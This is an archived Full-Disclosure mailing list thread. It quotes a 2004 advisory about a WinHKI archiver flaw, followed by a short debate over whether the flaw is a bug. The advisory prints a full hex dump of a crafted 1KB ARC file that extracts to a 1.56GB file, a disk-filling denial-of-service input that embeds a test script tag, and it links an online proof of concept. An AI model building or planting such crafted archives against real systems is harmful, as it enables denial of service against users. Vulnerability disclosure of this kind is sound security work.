[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <025c01c4f7f4$769b32e0$de03a8c0@Finjan.co.il>
From: rivgi at finjan.com (Rafel Ivgi)
Subject: WinHKI - ARC File Extraction of 1KB to 1.56GB
The original file wasn't a 1.56 with null that were compressed, it was a
smal file with 1024 FF's which was extracted to a
1.56 of nulls...that is not obvious, that is a bug.
Rafel Ivgi
Security Consultant
----- Original Message -----
From: "bipin gautam" <visitbipin@...oo.com>
To: <full-disclosure@...ts.netsys.com>
Sent: Saturday, January 08, 2005 11:29 AM
Subject: Re: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB
> that's obvious isn't it... say... if you create a few
> GB file with null characters, 0X00 and compress
> it...... that will produce a similar result. such
> issue is known for any file compress utility for ages.
>
>
> any... software will do the same! try it. and THAT'S
> OBVIOUS!
> --- "Rafel Ivgi, The-Insider" <theinsider@....net.il>
> wrote:
>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> Application: WinHKI
>> Vendors: http://www.webtoolmaster.com
>> Versions: 1.4d
>> Platforms: Windows
>> Bug: ARC File Extraction of 1KB to 1.56GB
>> Exploitation: Local (extract file)
>> Date: 24 Dec 2004
>> Author: Rafel Ivgi, The-Insider
>> E-Mail: the_insider@...l.com
>> Website: http://theinsider.deep-ice.com
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> 1) Introduction
>> 2) Bugs
>> 3) The Code
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ===============
>> 1) Introduction
>> ===============
>>
>> WinHKI is a file archiever which supports: ARC, BH,
>> CAB, HKI, JAR, LHA,TAR,
>>
>> GZ compressions.
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ======
>> 2) Bug
>> ======
>>
>> This is a normal CAB compressed file header
>>
>> 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B
>> ..251.HTM.^^^^^.
>> 00000010 0000 0078 3139 73B5 121B 0000 003C 7363
>> ...x19s......<sc
>> 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73
>> ript.>alert()</s
>> 00000030 6372 6970 743E 0D0A 1A00
>> cript>....
>>
>> By adding after the filename header a certain amount
>> of chars
>> and replacing all nulls (00) with FF (in order to
>> avoid our
>> long string from being terminated)
>>
>> 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF
>> ..251.HTM.^^^^^.
>> 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
>> ................
>> 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B
>> ................
>> 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363
>> ...x19s......<sc
>> 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73
>> ript.>alert()</s
>> 00000430 6372 6970 743E 0D0A 1A00
>> cript>....
>>
>>
>> HKI will create a 1.56 GIGA BYTE file on at the
>> selected extract location.
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ===========
>> 3) The Code
>> ===========
>>
>> An online proof of concept can be found at:
>> http://theinsider.deep-ice.com/hki156gb.ARC
>>
>>
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>
>> ---
>> Rafel Ivgi, The-Insider
>> http://theinsider.deep-ice.com
>>
>> "Scripts and Codes will make me D.O.S , but they
>> will never HACK me."
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter:
>> http://lists.netsys.com/full-disclosure-charter.html
>>
>
>
>
>
> __________________________________
> Do you Yahoo!?
> Yahoo! Mail - Easier than ever with enhanced search. Learn more.
> http://info.mail.yahoo.com/mail_250
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-----------------------------------------------
This message was scanned for malicious content and viruses by Finjan Internet Vital Security 1Box(tm)
Powered by blists - more mailing lists